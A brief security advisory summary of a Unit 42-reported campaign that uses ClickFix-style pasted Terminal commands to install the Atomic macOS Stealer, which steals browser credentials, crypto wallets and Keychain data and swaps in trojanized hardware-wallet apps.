A macOS-targeting campaign reported by Palo Alto Networks Unit 42 uses ClickFix-style social engineering to deliver the Atomic macOS Stealer (AMOS) via a Terminal command that automates DMG download, mount, and execution. The malware harvests credentials from 14 or more browsers, cryptocurrency wallets, and macOS Keychain, and replaces Ledger Live and Trezor Suite with trojanized versions for persistent crypto theft. No CVE applies; the attack depends entirely on user execution of a pasted Terminal command.